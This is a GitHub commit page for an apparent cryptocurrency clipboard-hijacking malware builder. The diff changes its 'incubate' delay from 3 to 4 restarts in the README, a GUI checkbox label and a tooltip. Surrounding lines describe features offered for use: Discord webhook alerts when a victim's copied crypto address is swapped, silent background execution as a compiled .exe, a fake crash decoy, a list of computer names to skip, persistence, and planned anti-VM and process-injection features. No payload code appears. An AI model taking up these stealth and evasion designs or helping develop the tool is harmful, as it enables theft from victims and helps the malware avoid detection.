Skip to content

Commit 3bada27

Browse files
author
3022-2
committed
fixed incubate facts
1 parent 169e8dc commit 3bada27

2 files changed

Lines changed: 4 additions & 4 deletions

File tree

README.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -33,7 +33,7 @@ malware features
3333
- allows discord webhook (whenever a address is detected you get a discord notification which says the computer name and that the address has been changed), doesnt need any installs as uses http.client rather than requests to send POST requests to webhook
3434
- option to ping @everyone
3535
- malware saved as .pyw and then compiled to .exe meaning that the malware runs in the background silently
36-
- has a 3 restard incubate feature
36+
- has a 4 restart incubate feature
3737
- has a ignore feature (to not run on computers with a given computer name)
3838

3939
features i will want to add in the future
@@ -48,7 +48,7 @@ features i will want to add in the future
4848
- [ ] anti virtual machine
4949
- [ ] process injection???? - maybe on this one, no idea how it works
5050
- [x] exclude - (exclude specific computer names and so on)
51-
- [x] incubate (only starts running after a specific amount of restarts)
51+
- [x] incubate (only starts running after 4 restarts)
5252
- [ ] second file persistence (if the first persistent file is removed successfully the second one will run - will be stored separately from main persistence files)
5353
- [ ] improve reset
5454
- [x] add fake error

main.pyw

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -541,7 +541,7 @@ class buildgui:
541541

542542
"""going to just use global here on"""
543543
global incubate_checkbox, false_error_checkbox
544-
incubate_checkbox = customtkinter.CTkCheckBox(master=config_scroll_frame, text="incubate (3 restarts)", onvalue="on", offvalue="off")
544+
incubate_checkbox = customtkinter.CTkCheckBox(master=config_scroll_frame, text="incubate (4 restarts)", onvalue="on", offvalue="off")
545545
incubate_checkbox.pack(pady=0, anchor="w", padx=(12, 0))
546546
false_error_checkbox = customtkinter.CTkCheckBox(master=config_scroll_frame, text="false error", onvalue="on", offvalue="off")
547547
false_error_checkbox.pack(pady=5, anchor="w", padx=(12, 0))
@@ -556,7 +556,7 @@ class buildgui:
556556
CTkToolTip.CTkToolTip(widget=add_icon_btn, message="add icon: sets a custom icon to the .exe - defult is the normal .exe icon. if icons not showing press the fix icons button", wraplength=300)
557557
CTkToolTip.CTkToolTip(widget=exit, message="exit: exits program", wraplength=300)
558558
CTkToolTip.CTkToolTip(widget=check_valid_btn, message="check valid: checks validity of crypto addresses and discord webhook", wraplength=300)
559-
CTkToolTip.CTkToolTip(widget=incubate_checkbox, message="incubate: if enabled the code will not run until the computer is restarted 3 times, increases stealth, IF INCUBATE IS ENABLED FALSE ERROR WILL NEVER COME UP", wraplength=300)
559+
CTkToolTip.CTkToolTip(widget=incubate_checkbox, message="incubate: if enabled the code will not run until the computer is restarted 4 times, increases stealth, IF INCUBATE IS ENABLED FALSE ERROR WILL NEVER COME UP", wraplength=300)
560560
CTkToolTip.CTkToolTip(widget=false_error_checkbox, message="false error: if enabled the code will throw a false error to make it look like the code has crashed when it really is just a decoy (wont be installed in the peristant file). IF INCUBATE IS ENABLED FALSE ERROR WILL NEVER COME UP", wraplength=300)
561561

562562
def main():

0 commit comments

Comments
 (0)